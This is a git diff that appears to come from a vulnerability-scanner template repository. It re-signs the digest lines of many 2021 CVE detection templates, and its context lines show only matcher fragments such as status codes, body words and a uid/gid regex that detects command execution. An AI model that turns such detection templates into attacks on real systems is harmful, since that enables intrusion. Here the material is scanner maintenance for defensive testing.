490a004630440220075cf8aaab4f450c31f5bd5e5b6b7e839a8dd3ffd51761edde4404e8c3d7981e02205ad12ae40ea77dda3bae7fd3fa3fad8e64eb20370bd29088ef6ee9deee776edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index bc9d924dcc..2510917b72 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -54,4 +54,4 @@ http: - status_code == 200 - contains(body_2, 'other_discount_code_') condition: and -# digest: 490a0046304402207de8e73991a2a2ea9f767132a911b28acd5f15f81350811d38a3eed802250e5202202138d48fcec072875db3d63ae94f864885f6b7fe49ca722e648872f42973317a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210080b4fd1ea8002928950a4be85999cc9bb3e3d35dd99ca34564c39556ae1544b002207c4249f959342254d0c492ed59ccd668a4925e63f456d78f2483e98a274c11b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index d9836f7442..56489c2999 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -91,4 +91,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a00473045022100a2dc206e80ff2c88040bf883e7489d77bd7a4ba89169ffe9abf27e1cf41829d20220116954a4772401f7f08bfc31ae8cc97d5589219a8c1386e5cf7e1b7ccb784c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100affc208d560258b988a4102b4a0b74bf763f1770d7a4121de09dd84e71c6a3d002200a3f19290647656ffda6fe12ab1f3723ef72de77cc055ce079e5cbaa0668bed6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 9436ad3701..3a79916784 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -91,4 +91,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4a0a0047304502201d36f0cf10b4c76f9ddc3bb3bb99e19b442a442dbe42041c7080344d95511da10221009ae56c847e4af6da7ee99e2fb6a713871b9b4c4f18e7a250accfcbe539bedefb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037935a3e65f8f4908bb9c8f481d1fb32f853b22c2c143630aec649b3096b3d70022006dadfcf9ce90429605af6cb7829cc716515bd08fafeb5d37e05201d727dd0e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 6ef6c2d41f..fa541fbf6e 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -91,4 +91,4 @@ http: - "var nsp_str = ['\"](.*)['\"];" internal: true part: body -# digest: 4b0a004830460221009a6b7e8c995a799eab6dbf7031c3c8bcc9cdbe807226b75b4891480a2fe957e6022100ea28cec825f736a274cd6c45321539c8711f0ee8c903afa10db4c2eea1c100df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b73510262d68af16164bc4e8c686727ff7ad2ea403bc819f79d04c459f62ed36022049744da0e55ca3053e2aceafb7b9a4a551ffa7304d25840b85af6840ef9c0666:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 084f103c09..8c71dcac8e 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -67,4 +67,4 @@ http: - 'name="nsp" value="(.*)">' internal: true part: body -# digest: 4a0a0047304502206b99d22bd9041fb52ab13aa83d2e997290b17108448b7cbf376053179bd36bee022100ca8607aa86f35144000ea54bac59cc3ac464d1f0f8d3943df0365a02f45c3777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092675b0c47ea89040420015957cfac465b1ce8b326c306fe4f449a58f5bc16600221008637625e195b7c2b5e6472542d8203ae20810663c57ef547a3cf8ac55eef0ea3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 84725781d2..eabbbe549e 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100add2fe38fb27afe8989f0cbd32e14563f1e1b7612526af6dd5d1c723b1b83a1a02210098a88773debb9a23aab1fcd53e0923b246a94a139d5f4f79dade985bfa73f5fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051f8b0a72d508fc9d1f0796dca183fdb4f91b7d4c7e1db8fbff3397ac5076934022100847cea9e369b5f17a6ea3646070f11392ab08cd1c3d60902f67ed61a7fbb2471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 2f7efb86b4..045514b774 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and -# digest: 490a0046304402202e93bb93d776a768ecf483221f92c3e95181cf2c0512c41f08b8ec201eabf7b10220373734ce19d8d990ad2571baaf3e154dd70515ef6699bdeb7455a1c8d206fc85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b913f246ed52547b6cf8d38eeb886a9c8e6ccdfd54a5fb9dfed931be1b37c98e022100f1d8901f4edf04df3a1e544f734cd3941996ac96dc7776e05744fcacf027eac5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index 4e07f9cebb..4c33fcf21e 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100af0669472ee6d120050a756ec247ac4624b4af1627bc9ac9d281331807de32a102210087a3d897f3438b97c0d8112ea154d4f2978a86367008dc2ea10aea18683af8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201b19d347e4a84d77d2a15b44f9dc9523cb8349ceb5aea200aa81343b16c4453602210082dc9e55f7930cb98bccd8c9078f39c2c133220a48313193ed68f1654fef8bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index b78d093874..fa3cee97fd 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022027d75fdadca9437abc6131d2b609906c1cb927065cfadb69156b64c33f157ad402202d21e0e5dbc0a324e8ffca5f84781731af8c0ffd88e27536dd806221d76f3427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025d9a106d54fbeb8e190d79ef6a8a7b0115628c0cf1359c46f6f7cf4785916ce022100ec4ec72a54802ea7d87deee4f897c58227858e81ab0f8bb8e217104484b2b935:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 3a73648a29..c9b15a9037 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015b28883b6b7bd8542fc6c3db1f9ed069c5e798dcf8404b8cf598686615b7d4702207a8fd46c908df97e8a8f0aaf59559c77493d7d80fc2dbeb1a377c71d9c0516a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022031f8331d22b8a67154ac4a3585ad931904c9d16747cea834e89d77d27f63261402202f4af8ea9ab77690df153e90b6ba34df6275e0da37229ad3f37d835a50ae3fb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index f871104a01..f74a3d72c7 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060906f5a13e7c9a79ec2f3046802a8847f412fde4539fe308415d82de26ec2880220648670c021a3d7303ba5f0f58d215957aa04ef13aea6d528f7081ae2a2baf80f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060a222c6efd6d19636dc9322f901a40f3810b9998e94fcdb9beb3be1182b878402203ef95777a69acac3af64b16e4885a0ee4d55c7f4e798ac1773e5cfef24d301f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26292.yaml b/http/cves/2021/CVE-2021-26292.yaml index 9cc5d1279f..d596777422 100644 --- a/http/cves/2021/CVE-2021-26292.yaml +++ b/http/cves/2021/CVE-2021-26292.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220783a27a9f302eb1f0c8e45ea8a22d1e853fea2b2e56b0041ccb5ccface450cc8022065911cb6c5c308387a1944b2453e7076e4e47420e808fc368ea5bbe1341b9072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 1f8caae574..babcd10858 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e05cf25baf8a7125ea91ca95e393436d8cb7d2602aa6e808cde865dc2fd9a3a022068baef15fbd64e8b03a59d088a802bf3f07555c90cd55279942b9b70dc5a29f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db3b9605b9b091097884dfe82d70288e337eae54bbefb926139d41d9b7c4b4ce02206c41d93b1c185cd9ef06c7cf71cfacc86d805c0a37f4c07eabb337978225e142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index bb71d92ba6..e3b437ac81 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -75,4 +75,4 @@ http: part: header words: - "OFBiz.Visitor=" -# digest: 490a004630440220074ac64f44417a7f6d8430a2c662eea374d6863ce79c50927936aa5ec00819b702204b704ebae3b0d400f855b7630f79aae12a9179fbc624517b2ba41c27110eba32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f8782812d594f0196d779bf77d2511fe6ac50c3755d49d198737c7c4f442cd16022100a670fb74657a92a1fd1f1f5c435ea157956d044239f378a5432041d15a5c1dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index f8ef1160d4..aeb58322be 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -67,4 +67,4 @@ http: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' internal: true -# digest: 4a0a00473045022100ebdd70d8922b70f58039980363aed0ef6b5f50c9ea4d53ae9190af3e2727f8af0220299dfb21583a5b4b45ad99f1699e641d9690b2a11068e94e8a967f5de14b09dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022068aef70efa5df942cb79bcdcb0e516cf19fb695d004e8c9b2b74d1bd866a9463022100d85e09ab9ef672758ad61a97a7c16006e886178f4a8d4a48929aa9aa8836b153:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 41efeb4b3a..3d88528a92 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220739717cfdce2e0373ef8d65dd1d94307d5cf47b90e78cece9ded1ece8cdfd6a302206eb0c5526d9b799bfea075230f373f32f084be5be819bb53d6ec0d0d96596dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf9804509b703eb0f99662a5c9599c9772068ed0739aff81d4979fb7c48dcba9022100a2ba6608202721d60c8dd162789aaa28f92e77ebc85624eaff9a24f3f6575f02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 73506d207b..a6f2ae8618 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c4d6bb7af75b7f3a5accdbe8eb2cb10b8ac70a355e26cae903fd300883998e31022100a430ae5f4c7bf7057dfe5020dfce175c166844cd56e48a64b4f338400e4573c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022049ee3047c58065abe27dccde3ba6fdb4ab1592acd6f06a407b4969022fe794b6022100f70d01f24238eaad171d2baac55c560830294a6f901bbd18d9065863b1bffda7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index 9f74dfe723..051a2ee425 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100faeb3156ba858fe91b062d14f9c7622c40a8e4bba7714ac68ecfea69a67a47a702210092f42640d23791838f59f78bbf5479a1d62585cc6c14413a4c69900d8c77664f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009965c91c7b448b9aab8a2485f8b9e7596357ece25035f2542a9d990877ada57c022100cb3f8e5ba3da1a61b0eb92ae5a6f410a48d7406f0f3343d2c2371a17d08a446c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 839a9faa52..f07a41555b 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -59,4 +59,4 @@ http: part: header words: - "application/json" -# digest: 4a0a00473045022100f4700c344cded0ad1a76552a9cf723498805f3c1e80942e9fe989eb0e82b3a190220531cf864289a0b38c68f30881e3ab85365460eef963c5154907c7913af1934e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9fb0444cbc3b5c51602ef602ff1880fb0067bae4fd721676e452f67a20d39ab022100c76ab68484f776711c3a90e8047c8cadc33901f2ca16336e096a2c89ee35da00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index 699a2f51aa..97d42a4a23 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009da7701be9e699d6c8cfb7d6d502b67994b8bd7588fd3ba31d79fc30acfb5728022100f0c66ec762d48b3c4f2408958cf655a1d696afca93ae85b154898eb472980951:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011114e55f427c5c0cb3f1d7c6103073c1213207ae385557c419f07609587a76702204ca46f5b36c70ef46dbf6f665b41bef0cc15c48017836e493a3ad4ed38a65f66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index ca034ef637..749150fdbe 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048a943d90a79828cac930da23344723c90a9d4a5727d06e79cd2c6d9c422436e0220447a0b022e0d5f3632a8ffe251db457d67ffd60af93d8fcd1f2bc98c0366fbab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096193552bb1308ff4af0bd2cedbb19f81f6a2d167bd0c80e8c8e9e7c228540c702207e9846cc77f42a77a6ac87c88cca089a914b18bfb2b67c6e1f42f4f7c23db44b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index ba8becd142..96d308d895 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100acd1dd610e280bd360171a8b76652c445a5e7419324dbf618684f72477baff5d022100b980579bec70c2df8580259a9dd5bc729c801c7bea36b518f3933cd07aa9e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205415eedc43536bf50687094ab55d201c96e6d11aee855c35e9e2bd78e2a139420220127c277cdfae46eab2317d4efcda6c7096d437af1dad6d3744b5867edb1514c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index 20f7526051..b771e4760d 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -64,4 +64,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a00473045022018a1380d7f6879c31c55d6a19a3ab98cce3b9bb4fc0cfd3f9f24b2a7ac7d1f1c022100d168841e4ff2477c158fb403078752b4f71a8977387de03062fc0fabcd80f130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d3ae31d598288830e73282097708a2e8cf7662683648065dc08348d725cbd8e702206b5bd9e44ebd79632622dc1db5531bb6ecc6ed452c9cbf541510a775ac5273a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index 8d2df8adee..85091cdce3 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd30c5e0ce9daa91aafda8c85d31f33bff251466bf3d916601d92ca50549acea022100feac624da9d405aac50e6dfeeef41d8e03baaa2f6a8b76950df8dcca1fa92f17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004214644bd57bd24c957e45f5ccfd124047b01bb84fb6b801be733bb59b057af022100f7046d4548d8ec7f1c3d6b89acb2beb064ade7f0cf2f972ee92c906323543d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 651989990e..28cb1076b7 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220543f456226b5ababe273ce9ad8c34d065bb95024abb3a99cfd1b28be68fd898f02204b87ac2d557eb22432055d8b6319a30fc6e69fafa9032a16626296da752838d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220477d60cb870cc02506fde4497ef8fa57fece5a98b9024ff32b6e5bfc493c635e02205e66553b9f26021e2bc2e2e3dba2f806c4f7bd7fbacc7bcac5098d27f319dde2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index e79da76836..d0aaf96bd8 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -61,4 +61,4 @@ http: part: header_3 status: - 200 -# digest: 490a00463044022100e1841541a5025ffd6da8020de720413646d494700f511011ae3bb2971314b64c021f722e5fd3aa1cb5637ca501f90b000a932a1ed027eb768fce485acef0529dd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a66593f5990f14cef08cd06a2cb12e312b42e73c046a4e3a92b8875e6224558022100c04d6f069d0ba1fbd4d2361d817b1a9e9dc10af26f5540980ea831342374bba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index 58ba081df6..72a1aa084b 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - 'contains(body, "jato.pageSession") && status_code==200' -# digest: 4a0a00473045022018740d51e31f47d235d42ac17499f76c59b88b9553a00cf26236023c5cb4888a022100c360cf59b1ed16012bb0e2528114d01c7dde3c57f2214032e11e5f6a0cdc0333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e4bb214ed434b6c75a1d3011338a5c9e65649ff6cd3ad8e9f91358194c0513902210096cbc0163a37343fd5bc44e117e2db50207ab13fe70f7ee15dbd1e861db65315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index 705f62e550..d12448b8a7 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -70,4 +70,4 @@ http: part: body words: - 'value="responseMessage"' -# digest: 4b0a00483046022100813d5eb87f57f57c8aaabec48c2d93322e130fddfb4efd2548f0e4c76a297184022100a7989c6ba589f72752685e797b8d120362922ec48f77001718ba3eedc3ff73bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e0295e0c024bb1aaca80a8d18779019589dce1bb14a770440d2159d4d9dd8500220688c7dc355595b0d0401e4863626125828d0bbce8fe1ce46c1d7499d1ef86960:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index bf949ed3a8..ee784b5154 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210086f0b6717e92fde831b9d03965dc5886a532a38fa4b25ccbeac472571b01e68202210091c744cbb3962ce06260a00088c5b0680be0b4a5b9f95a728cf6113059a32fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008708553f92fa889fe94e2e1e0179bc7fce9e53b6ee2b269d9a14da5c3992d9e702201716126335928b1f023b3fe60ebe030afac3410a41de7837f279ac714969465a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 3c9492f9cb..0689c73f7d 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1b3e6494b9cd0a8ce79cafe3a6710f2c519e0a794837ff0672b7d57aa880c77022062de7ad4f0c57430d491bfae754d755efc7ad51013fc4471a85783e674925b72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100867db1d09deedf2664021f22878cba4e896143a676977bd676580d1180f202c2022020bdb614a8f9e72f7b7e7f14ed1d5a39cde07b93c1e61a38305477a99391e9e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index fb0f76cc0d..c016bfbad6 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -73,4 +73,4 @@ http: part: body words: - 'value="errorMessage"' -# digest: 4a0a004730450220378972d9f55dda8779aa831590d85f9331f5e4e427991c707692706dd817ebe60221008c5efea71f9e6388f6b558b5224deb9ba7bdc8fc81d19ec3e81a76c431152471:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207342d7c86b8356fb4e70925a7e676ff9ee32b385c78b7f8f9c73b2dc06b9e01502207a8b02b34b8b9839b42ea882042449a70a2e72294567dc23f6e4c829d4f967ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index 2fbe4aec89..7c6d7070e2 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220386e41252b4cdca8b218a3f6b861ee08a552be97be25783c1f280a6f976fba2602210098de271bd4f0532af5934b1a781f295f9a524b66cd2b3e831227d145af50b60d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220532fd50de22a681b694867eec12b118b6418f7def8cbf6728d9b338c55841b3b022100e679573f2cbc59d10be428cee3fe310ccf494da28470b3692b8c374baabc68c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 5079a1b914..eed5a45cad 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fc05eb717e7b84bb0bde4f0cccd8943c67d59f15011f279e75212a27698d53700220287c2e9a2a6415f33a7f5605dd777db2502d48c54a3d7c9b28acca223d0054df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df4aa36fcf02435df47612fc24188205b165d1ff3f95fc49e7d1453eb7981d1602210087a198b19c74326e0c6ae3d7bf00dfd79f2ec6acfdc82915e1353e992cc9f012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index c317eb1570..7382761c67 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220636647297d4ef8ee4209bcdd8e9c628fadf1cbce433fc90c55a3610304409ddc022100a82da2af0c0b6fb1b2eeba56b7cf873e164f198d04e1301afd9c07ecfef0f726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c9bc6152f452ae7228664bef82fa6563727c21333e3add63b2726fb4dd7b4e1022100e5f65d18bee6f51458ec66471225f36aff942abca74f8ae105b0b28ba8a73946:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index db25b63614..39cbe269d0 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -93,4 +93,4 @@ http: - type: regex regex: - "(u|g)id=.*" -# digest: 490a0046304402205d2d40971acbffaccca7916ae65339dd25b3b3176b5f0da6e1e552afae33f0f6022009d0e75478ce655b009e77c18c2b19b3dec3fb49e155e93b7f5bafb2f58c2f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa6df3a8575f8d21cd204728e9cdb16b47126a35ff1ca16ae8fa1398841f0015022100c34c90c9f12c146abc1da92ae9fa05bbe773dcbff42ccadedba93ba6a4ea3bd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index fae99b6e09..cf3ba6c5d9 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fc9ed93c6e938c96e612190d3b15c829dc82e6f16f8229c8387cfd205ab43770220660a35947ff68a217b4aaac34bbe7089f6da7f8dca0181606d0334b634330d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008311012108a6f2dd810972b248dcf42d0c33ead20d3a6d5e52e6c04d28f4e46002201f8e614aae65b077d9c0f8569ae4a9c9d10a97b17d2b28a8a3435a0e53ef3377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31602.yaml 